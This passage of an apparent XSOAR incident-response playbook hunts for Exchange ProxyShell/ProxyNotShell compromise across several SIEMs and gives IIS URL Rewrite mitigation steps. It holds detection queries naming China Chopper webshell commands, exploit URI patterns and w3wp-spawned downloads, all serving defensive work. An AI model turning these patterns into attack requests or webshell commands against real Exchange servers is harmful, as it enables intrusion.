    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 570,
          "y": 240
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "46":
    id: "46"
    taskid: f4eb1330-f887-46a9-86c2-d456051fc4f3
    type: regular
    task:
      id: f4eb1330-f887-46a9-86c2-d456051fc4f3
      version: -1
      name: Detect suspicious ASPX file dropped by Exchange
      description: Searches an index.
      tags:
      - SIEMResults
      script: '|||search'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "55"
    scriptarguments:
      index:
        complex:
          root: inputs.ElasticIndex
      query:
        simple: (process.executable.text:*\\w3wp.exe AND process.command_line.text:*MSExchange*       AND file.path.text:(*FrontEnd\\HttpProxy\\* OR *\\inetpub\\wwwroot\\aspnet_client\\*)       AND file.path.text:(*.aspx OR *.asp OR *.ashx))
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 880,
          "y": 1400
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "47":
    id: "47"
    taskid: 3bc1ffa4-e1bc-48a0-892d-83d1bb4dcb04
    type: condition
    task:
      id: 3bc1ffa4-e1bc-48a0-892d-83d1bb4dcb04
      version: -1
      name: Is Azure Log Analytics Enabled?
      description: Returns 'yes' if integration brand is available. Otherwise returns 'no'
      type: condition
      iscommand: false
      brand: ""
    nexttasks:
      '#default#':
      - "54"
      "yes":
      - "48"
      - "49"
      - "53"
      - "50"
      - "52"
      - "51"
      - "76"
    separatecontext: false
    conditions:
    - label: "yes"
      condition:
      - - operator: isExists
          left:
            value:
              complex:
                root: modules
                filters:
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.brand
                      iscontext: true
                    right:
                      value:
                        simple: Azure Log Analytics
                    ignorecase: true
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.state
                      iscontext: true
                    right:
                      value:
                        simple: active
                    ignorecase: true
            iscontext: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 2080
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "48":
    id: "48"
    taskid: 4506084c-1e0f-4842-8291-c36062b0ec8f
    type: regular
    task:
      id: 4506084c-1e0f-4842-8291-c36062b0ec8f
      version: -1
      name: Detect Exchange SSRF Autodiscover ProxyShell
      description: |-
        This query looks for suspicious request patterns to Exchange servers that fit patterns recently blogged about by PeterJson. This exploitation chain utilizes an SSRF vulnerability in Exchange which eventually allows the attacker to execute arbitrary Powershell on the server. In the example, PowerShell can be used to write an email to a disk with an encoded attachment containing a shell.

        **Reference:**
        * https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
      tags:
      - SIEMResults
      script: '|||azure-log-analytics-execute-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "54"
    scriptarguments:
      query:
        simple: |-
          let successCodes = dynamic([200, 302, 401]);
            W3CIISLog
            | where scStatus has_any (successCodes)
            | where ipv4_is_private(cIP) == False
            | where csUriStem hasprefix "/autodiscover/autodiscover.json"
            | project TimeGenerated, cIP, sIP, sSiteName, csUriStem, csUriQuery, Computer, csUserName, _ResourceId, FileUri
            | where (csUriQuery !has "Protocol" and isnotempty(csUriQuery))
            or (csUriQuery has_any("/mapi/", "powershell"))
            or (csUriQuery contains "@" and csUriQuery matches regex @"\.[a-zA-Z]{2,4}?(?:[a-zA-Z]{2,4}\/)")
            or (csUriQuery contains ":" and csUriQuery matches regex @"\:[0-9]{2,4}\/")
            | extend timestamp = TimeGenerated, HostCustomEntity = Computer, IPCustomEntity = cIP, AccountCustomEntity = csUserName, ResourceCustomEntity = _ResourceId, FileCustomEntity = FileUri
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1640,
          "y": 2280
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "49":
    id: "49"
    taskid: 1265fc8e-bc6c-4dc6-81b8-9ebaf1532ada
    type: regular
    task:
      id: 1265fc8e-bc6c-4dc6-81b8-9ebaf1532ada
      version: -1
      name: Detect Exchange server suspicious file downloads
      description: "This query looks for messages related to file downloads of suspicious file types on an Exchange Server. This could indicate the attempted deployment of webshells. \nThis query uses the Exchange HttpProxy AOBGeneratorLog. Before using this query, you will need to onboard this log as a custom log under the table http_proxy_oab_CL. \nThis log is commonly found at \nC:\\Program Files\\Microsoft\\ExchangeServer\\V15\\Logging\\OABGeneratorLog on the Exchange server. \n\nDetails on collecting custom logs into Sentinel can be found here: https://learn.microsoft.com/azure/sentinel/connect-custom-logs"
      tags:
      - SIEMResults
      script: '|||azure-log-analytics-execute-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "54"
    scriptarguments:
      query:
        simple: |-
          let scriptExtensions = dynamic([".php", ".jsp", ".js", ".aspx", ".asmx", ".asax", ".cfm", ".shtml"]);
            http_proxy_oab_CL
            | where RawData contains "Download failed and temporary file"
            | extend File = extract("([^\\\\]*)(\\\\[^']*)",2,RawData)
            | extend Extension = strcat(".",split(File, ".")[-1])
            | extend InteractiveFile = iif(Extension in (scriptExtensions), "Yes", "No")
            // Uncomment the following line to alert only on interactive file download type
            //| where InteractiveFile =~ "Yes"
            | extend timestamp = TimeGenerated, HostCustomEntity = Computer
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1220,
          "y": 2280
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "50":
    id: "50"
    taskid: dcd8d009-8eeb-4ae4-80c7-5ca891384b53
    type: regular
    task:
      id: dcd8d009-8eeb-4ae4-80c7-5ca891384b53
      version: -1
      name: Detect Exchange worker process making remote call
      description: This query dynamically identifies Exchange servers and then looks for instances where the IIS worker process initiates a call to a remote URL using either cmd.exe or powershell.exe. This behaviour was described as post-compromise behaviour following the exploitation of CVE-2022-41040 and CVE-2022-41082. This pattern of activity was used to download additional tools to the server. This suspicious activity is generic.
      tags:
      - SIEMResults
      script: '|||azure-log-analytics-execute-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "54"
    scriptarguments:
      query:
        simple: |-
          let suspiciousCmdLineKeywords = dynamic(["http://", "https://"]);
            // Identify exchange servers based on known paths
            // Summarize these to get a list of exchange server hostnames
            let exchangeServers = W3CIISLog
            | where csUriStem has_any("/owa/","/ews/","/ecp/","/autodiscover/")
            // Only where successful, rule out failed scanning
            | where scStatus startswith "2"
            | summarize by Computer;
            DeviceProcessEvents
            | where DeviceName in~ (exchangeServers)
            // Where the IIS worker process initiated CMD or PowerShell
            | where InitiatingProcessParentFileName == "w3wp.exe"
            | where InitiatingProcessFileName has_any("cmd.exe", "powershell.exe")
            // Where CMD or PowerShell command line included parameters associated with CVE-2022-41040/CVE-2022-41082 exploitation
            | where ProcessCommandLine has_any(suspiciousCmdLineKeywords)
            | project TimeGenerated, DeviceId, DeviceName, InitiatingProcessFileName, ProcessCommandLine
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -800,
          "y": 2280
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "51":
    id: "51"
    taskid: c88d4c5f-3db9-4064-816f-b747c20c34dd
    type: regular
    task:
      id: c88d4c5f-3db9-4064-816f-b747c20c34dd
      version: -1
      name: Detect suspicious ASPX file dropped by Exchange
      description: |-
        Detects suspicious file types dropped by an Exchange component in IIS into a suspicious folder.

        **Author:** Florian Roth (rule), MSTI (query, idea)

        **Status:** experimental

        **References:**
           - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
           - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html
           - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
      tags:
      - SIEMResults
      script: '|||azure-log-analytics-execute-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "54"
    scriptarguments:
      query:
        simple: SecurityEvent |  where EventID == 11 | where (Image endswith @'\w3wp.exe' and CommandLine contains 'MSExchange' and (TargetFilename contains @'FrontEnd\HttpProxy\' or TargetFilename contains @'\inetpub\wwwroot\aspnet_client\') and (TargetFilename endswith '.aspx' or TargetFilename endswith '.asp' or TargetFilename endswith '.ashx'))
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 510,
          "y": 2280
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "52":
    id: "52"
    taskid: 16847257-59a3-4dd1-8013-0f123bf1dbd7
    type: regular
    task:
      id: 16847257-59a3-4dd1-8013-0f123bf1dbd7
      version: -1
      name: Detect Exchange IIS worker dropping webshell
      description: "This query was originally published in the threat analytics report, \"Exchange Server zero-days exploited in the wild\".\nIn early March 2021, Microsoft released patches for four different zero-day vulnerabilities affecting Microsoft Exchange Server. The vulnerabilities were being used in a coordinated attack. For more information on the vulnerabilities, visit the following links:\n  1. CVE-2021-26855\n  2. CVE-2021-26857\n  3. CVE-2021-26858\n  4. CVE-2021-27065\n\nThe following query checks for the IIS worker process in Exchange Server dropping files that appear to be the web shells and other threat artifacts observed in known attacks.\nMore queries related to this threat can be found under the See also section of this page.\n\n**Reference:** \n* https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/"
      tags:
      - SIEMResults
      script: '|||azure-log-analytics-execute-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "54"
    scriptarguments:
      query:
        simple: |-
          DeviceFileEvents
            | where InitiatingProcessFileName == 'w3wp.exe' | where InitiatingProcessCommandLine contains "MSExchange"
            | where FolderPath has_any ("\\wwwroot\\", "HttpProxy\\owa\\","\\Temporary ASP.NET Files\\")
            | where not(FolderPath has_any("\\tmp\\","\\dl3\\"))
            | where FolderPath !endswith ".log" | where FolderPath !endswith ".json"
            | where FolderPath !endswith ".ini"
            | where FolderPath !endswith ".vb"
            | where FolderPath !endswith '.tmp'
            | where FolderPath !endswith '.xml'
            | where FolderPath !endswith '.js'
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 2280
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "53":
    id: "53"
    taskid: 74dfec50-3e38-48a3-8b7b-19f6a44bab29
    type: regular
    task:
      id: 74dfec50-3e38-48a3-8b7b-19f6a44bab29
      version: -1
      name: Detect Chopper Webshell process pattern
      description: |-
        Detects patterns in process executions caused by China Chopper-like tiny (ASPX) webshells.

        **Author:** Florian Roth (rule), MSTI (query)

        **Status:** experimental

        **References:**
            - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
      tags:
      - SIEMResults
      script: '|||azure-log-analytics-execute-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "54"
    scriptarguments:
      query:
        simple: SecurityEvent |  where EventID == 4688 | where ((NewProcessName endswith @'\w3wp.exe' or ParentProcessName endswith @'\w3wp.exe') and (CommandLine contains '&ipconfig&echo' or CommandLine contains '&quser&echo' or CommandLine contains '&whoami&echo' or CommandLine contains '&c:&echo' or CommandLine contains '&cd&echo' or CommandLine contains '&dir&echo' or CommandLine contains '&echo [E]' or CommandLine contains '&echo [S]'))
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 100,
          "y": 2280
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "54":
    id: "54"
    taskid: c0095f4f-9f1c-4d10-89d0-071fb23d65f5
    type: title
    task:
      id: c0095f4f-9f1c-4d10-89d0-071fb23d65f5
      version: -1
      name: Cortex XDR Advanced Hunting
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "10"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 2480
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "55":
    id: "55"
    taskid: d475f731-23e5-473a-8bc3-30106c4a7384
    type: title
    task:
      id: d475f731-23e5-473a-8bc3-30106c4a7384
      version: -1
      name: Azure Sentinel Advanced Hunting
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "47"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 1930
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "56":
    id: "56"
    taskid: 15a67a70-9eb2-4819-8e78-33e8ba50bd71
    type: regular
    task:
      id: 15a67a70-9eb2-4819-8e78-33e8ba50bd71
      version: -1
      name: Detection of China Chopper webshell activity
      description: |-
        Execute an XQL query and retrieve results of an executed XQL query API. The command will be executed every 10 seconds until results are retrieved or until a timeout error is raised.
        When more than 1000 results are retrieved, the command will return a compressed gzipped JSON format file,
        unless the argument 'parse_result_file_to_context' is set to true and then the results will be extracted to the context.
      script: '|||xdr-xql-generic-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "19"
    scriptarguments:
      query:
        simple: "// Detection of China Chopper webshell activity\n\nconfig case_sensitive = false\n| dataset = xdr_data \n| filter event_type = ENUM.PROCESS and actor_process_image_name = \"w3wp.exe\" and (action_process_image_command_line contains \"&ipconfig&echo\" or action_process_image_command_line contains \"&quesr&echo\" or action_process_image_command_line contains \"&whoami&echo\" or action_process_image_command_line contains \"&c:&echo\" or action_process_image_command_line contains \"&cd&echo\" or action_process_image_command_line contains \"&echo [E]\" or action_process_image_command_line contains \"&echo [S]\")\n| fields action_process_image_command_line , actor_process_image_path , actor_effective_username , agent_hostname "
      query_name:
        simple: Detection of China Chopper webshell activity
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -970,
          "y": 3630
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "57":
    id: "57"
    taskid: beea3d61-f91f-49cb-8866-46d8506f35ef
    type: regular
    task:
      id: beea3d61-f91f-49cb-8866-46d8506f35ef
      version: -1
      name: Detect suspicious files in Exchange directories
      description: |-
        Execute an XQL query and retrieve results of an executed XQL query API. The command will be executed every 10 seconds until results are retrieved or until a timeout error is raised.
        When more than 1000 results are retrieved, the command will return a compressed gzipped JSON format file,
        unless the argument 'parse_result_file_to_context' is set to true and then the results will be extracted to the context.
      script: '|||xdr-xql-generic-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "19"
    scriptarguments:
      query:
        simple: "// Detect suspicious files in Exchange directories\n\nconfig case_sensitive = false timeframe = 30d\n| dataset = xdr_data \n| filter event_type = ENUM.FILE and actor_process_image_name = \"w3wp.exe\" and action_file_path contains \"FrontEnd\\HttpProxy\" and actor_process_command_line contains \"MSExchange\"\n| fields  actor_effective_username , agent_hostname , actor_process_command_line, action_file_path , action_file_sha256"
      query_name:
        simple: Detect suspicious files in Exchange directories
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -550,
          "y": 3630
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "58":
    id: "58"
    taskid: 332eb3f9-5dc7-43ca-8244-cc2d1d61b729
    type: title
    task:
      id: 332eb3f9-5dc7-43ca-8244-cc2d1d61b729
      version: -1
      name: Download Mitigation Tools
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "23"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": -530
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "59":
    id: "59"
    taskid: 1307648e-0432-4905-8330-1f12bbff8825
    type: regular
    task:
      id: 1307648e-0432-4905-8330-1f12bbff8825
      version: -1
      name: Mitigate IIS URL Rewrite - ProxyNotShell
      description: "1. Microsoft mitigation tool, **EOMTv2**, is available for download directly via XSOAR.\n2. Mitigate Manually using the following instructions:\n    1. Open IIS Manager. \n    2. Select Default Web Site.\n    3. In the Feature View, click URL Rewrite.\n    4. In the Actions pane on the right-hand side, click Add Rule(s)…  \n    5. Select Request Blocking and click OK. \n    6. Add the string “.*autodiscover\\.json.*\\@.*Powershell.*” (excluding quotes).\n    7. Select Regular Expression under Using.\n    8. Select Abort Request under How to block and then click OK.\n    9. Expand the rule and select the rule with the pattern .*autodiscover\\.json.*\\@.*Powershell.* and click Edit under Conditions. \n    10. Change the Condition input from {URL} to {REQUEST_URI}\n\n**NOTE:** If you need to change any rule, it is best to delete and recreate it.\n\n**Impact:** There is no known effect on Exchange functionality if URL Rewrite is installed as recommended. "
      type: regular
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "30"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -80,
          "y": 4250
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "60":
    id: "60"
    taskid: 2da7e790-b582-42bf-8ea8-10fef981c22f
    type: condition
    task:
      id: 2da7e790-b582-42bf-8ea8-10fef981c22f
      version: -1
      name: Is QRadar Enabled?
      description: Check whether the values provided in arguments are equal. If either of the arguments are missing, no is returned.
      type: condition
      iscommand: false
      brand: ""
    nexttasks:
      '#default#':
      - "55"
      QRadar v2:
      - "8"
      - "42"
      - "74"
      QRadar v3:
      - "66"
      - "68"
      - "75"
    separatecontext: false
    conditions:
    - label: QRadar v2
      condition:
      - - operator: isExists
          left:
            value:
              complex:
                root: modules
                filters:
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.brand
                      iscontext: true
                    right:
                      value:
                        simple: QRadar_v2
                    ignorecase: true
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.state
                      iscontext: true
                    right:
                      value:
                        simple: active
            iscontext: true
          right:
            value: {}
    - label: QRadar v3
      condition:
      - - operator: isExists
          left:
            value:
              complex:
                root: modules
                filters:
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.brand
                      iscontext: true
                    right:
                      value:
                        simple: QRadar v3
                    ignorecase: true
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.state
                      iscontext: true
                    right:
                      value:
                        simple: active
                    ignorecase: true
            iscontext: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1390,
          "y": 1170
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "61":
    id: "61"
    taskid: ab9c4901-0ec4-4ed3-8575-d73b17276460
    type: condition
    task:
      id: ab9c4901-0ec4-4ed3-8575-d73b17276460
      version: -1
      name: Is Splunk Enabled?
      description: Check whether the values provided in arguments are equal. If either of the arguments are missing, no is returned.
      type: condition
      iscommand: false
      brand: ""
    nexttasks:
      '#default#':
      - "55"
      "Yes":
      - "31"
      - "7"
      - "72"
    separatecontext: false
    conditions:
    - label: "Yes"
      condition:
      - - operator: isExists
          left:
            value:
              complex:
                root: modules
                filters:
                - - operator: containsGeneral
                    left:
                      value:
                        simple: modules.brand
                      iscontext: true
                    right:
                      value:
                        simple: Splunkpy
                    ignorecase: true
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.state
                      iscontext: true
                    right:
                      value:
                        simple: active
            iscontext: true
          right:
            value: {}
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 1170
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "62":
    id: "62"
    taskid: ed9f5386-82bc-457e-83de-3fbf2597c81e
    type: condition
    task:
      id: ed9f5386-82bc-457e-83de-3fbf2597c81e
      version: -1
      name: Is Elasticsearch Enabled?
      description: Check whether the values provided in arguments are equal. If either of the arguments are missing, no is returned.
      type: condition
      iscommand: false
      brand: ""
    nexttasks:
      '#default#':
      - "55"
      "Yes":
      - "46"
      - "9"
      - "73"
    separatecontext: false
    conditions:
    - label: "Yes"
      condition:
      - - operator: isExists
          left:
            value:
              complex:
                root: modules
                filters:
                - - operator: containsGeneral
                    left:
                      value:
                        simple: modules.brand
                      iscontext: true
                    right:
                      value:
                        simple: Elasticsearch
                    ignorecase: true
                - - operator: isEqualString
                    left:
                      value:
                        simple: modules.state
                      iscontext: true
                    right:
                      value:
                        simple: active
            iscontext: true
          right:
            value: {}
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 330,
          "y": 1170
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "63":
    id: "63"
    taskid: 85e1520a-ce1f-4679-8c4f-31cb81eee8c9
    type: title
    task:
      id: 85e1520a-ce1f-4679-8c4f-31cb81eee8c9
      version: -1
      name: Set Rapid Breach Response Layout
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "65"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 570
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "65":
    id: "65"
    taskid: 166dd47b-0771-4184-82e0-ca5e457f9e2e
    type: playbook
    task:
      id: 166dd47b-0771-4184-82e0-ca5e457f9e2e
      version: -1
      name: Rapid Breach Response - Set Incident Info
      description: This playbook is responsible for setting up the Rapid Breach Response Incident Info tab in the layout.
      playbookName: Rapid Breach Response - Set Incident Info
      type: playbook
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "3"
    scriptarguments:
      SourceOfIndicators:
        complex:
          root: http.parsedBlog
          accessor: sourceLink
      countTotalIndicators:
        complex:
          root: ExtractedIndicators
          accessor: Domain
          transformers:
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.IP
                iscontext: true
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.URL
                iscontext: true
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.File
                iscontext: true
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.CVE
                iscontext: true
          - operator: uniq
          - operator: count
      playbookDescription:
        complex:
          root: inputs.PlaybookDescription
    separatecontext: true
    continueonerrortype: ""
    loop:
      iscommand: false
      exitCondition: ""
      wait: 1
      max: 100
    view: |-
      {
        "position": {
          "x": -310,
          "y": 700
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "66":
    id: "66"
    taskid: b7db1d45-61cd-4600-817e-d84caeaa0dc6
    type: regular
    task:
      id: b7db1d45-61cd-4600-817e-d84caeaa0dc6
      version: -1
      name: Detect Chopper Webshell process pattern
      description: Creates a new asynchronous Ariel search. Returns the search ID. Search status and results can be polled by sending the search ID to the 'qradar-search-status-get' and 'qradar-search-results-get' commands. Accepts SELECT query expressions only.
      script: '|||qradar-search-create'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "69"
    scriptarguments:
      query_expression:
        simple: SELECT UTF8(payload) from events where LOGSOURCETYPENAME(devicetype)='Microsoft Windows Security Event Log' and ("Image" ilike '%\w3wp.exe' or "ParentImage" ilike '%\w3wp.exe') and ("Process CommandLine" ilike '%&ipconfig&echo%' or "Process CommandLine" ilike '%&quser&echo%' or "Process CommandLine" ilike '%&whoami&echo%' or "Process CommandLine" ilike '%&c:&echo%' or "Process CommandLine" ilike '%&cd&echo%' or "Process CommandLine" ilike '%&dir&echo%' or "Process CommandLine" ilike '%&echo [E]%' or "Process CommandLine" ilike '%&echo [S]%')
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -2220,
          "y": 1570
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "68":
    id: "68"
    taskid: 9d8270a4-9d70-4dbf-87ae-f1f5bd06c99c
    type: regular
    task:
      id: 9d8270a4-9d70-4dbf-87ae-f1f5bd06c99c
      version: -1
      name: Detect suspicious ASPX file dropped by Exchange
      description: Creates a new asynchronous Ariel search. Returns the search ID. Search status and results can be polled by sending the search ID to the 'qradar-search-status-get' and 'qradar-search-results-get' commands. Accepts SELECT query expressions only.
      script: '|||qradar-search-create'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "69"
    scriptarguments:
      query_expression:
        simple: SELECT UTF8(payload) from events where LOGSOURCETYPENAME(devicetype)='Microsoft Windows Security Event Log' and (CATEGORYNAME(category) ILIKE 'File Created' or CATEGORYNAME(category) ILIKE 'Successful File Modification') and "Image" ilike '%\w3wp.exe' and "Process CommandLine" ilike '%MSExchange%' and ("Filename" ilike '%FrontEnd\HttpProxy\%' or "Filename" ilike '%\inetpub\wwwroot\aspnet_client\%') and ("Filename" ilike '%.aspx' or "Filename" ilike '%.asp' or "Filename" ilike '%.ashx')
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1810,
          "y": 1570
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "69":
    id: "69"
    taskid: a457000e-ba1d-48ab-8e51-aa69282471f9
    type: regular
    task:
      id: a457000e-ba1d-48ab-8e51-aa69282471f9
      version: -1
      name: QRadar fetch query results
      description: Retrieves search results.
      script: '|||qradar-search-results-get'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "55"
    scriptarguments:
      search_id:
        complex:
          root: QRadar.Search
          accessor: ID
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1810,
          "y": 1750
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "70":
    id: "70"
    taskid: 50495b45-dd33-498e-8736-db568b411533
    type: playbook
    task:
      id: 50495b45-dd33-498e-8736-db568b411533
      version: -1
      name: PAN-OS Query Logs For Indicators
      description: 'This playbook queries the following PAN-OS log types: traffic, threat, url, data-filtering and wildfire. The playbook accepts inputs such as IP. hash, and url.'
      playbookName: PAN-OS Query Logs For Indicators
      type: playbook
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "55"
    scriptarguments:
      filedigest:
        complex:
          root: ExtractedIndicators.File
          filters:
          - - operator: hasLength
              left:
                value:
                  simple: ExtractedIndicators.File
                iscontext: true
              right:
                value:
                  simple: "32"
            - operator: hasLength
              left:
                value:
                  simple: ExtractedIndicators.File
                iscontext: true
              right:
                value:
                  simple: "64"
          transformers:
          - operator: uniq
      ip:
        complex:
          root: ExtractedIndicators
          accessor: IP
          transformers:
          - operator: uniq
      url:
        complex:
          root: ExtractedIndicators
          accessor: Domain
          transformers:
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.URL
                iscontext: true
          - operator: uniq
    separatecontext: true
    continueonerrortype: ""
    loop:
      iscommand: false
      exitCondition: ""
      wait: 1
      max: 100
    view: |-
      {
        "position": {
          "x": 1850,
          "y": 1170
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "72":
    id: "72"
    taskid: d755d776-6098-4102-8ce2-37b13038c3d7
    type: regular
    task:
      id: d755d776-6098-4102-8ce2-37b13038c3d7
      version: -1
      name: Detect a possibly successful ProxyNotShell bypass attempt.
      description: Detect a possibly successful ProxyNotShell bypass attempt.
      tags:
      - SIEMResults
      script: '|||splunk-search'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "55"
    scriptarguments:
      earliest_time:
        complex:
          root: inputs.SplunkEarliestTime
      latest_time:
        complex:
          root: inputs.SplunkLatestTime
      query:
        simple: source="WinEventLog:*" AND (sc-status="200" AND c-uri="/owa/*@*/powershell")
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -950,
          "y": 1400
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "73":
    id: "73"
    taskid: a976674c-6e26-402d-8f97-35cc31b5da5a
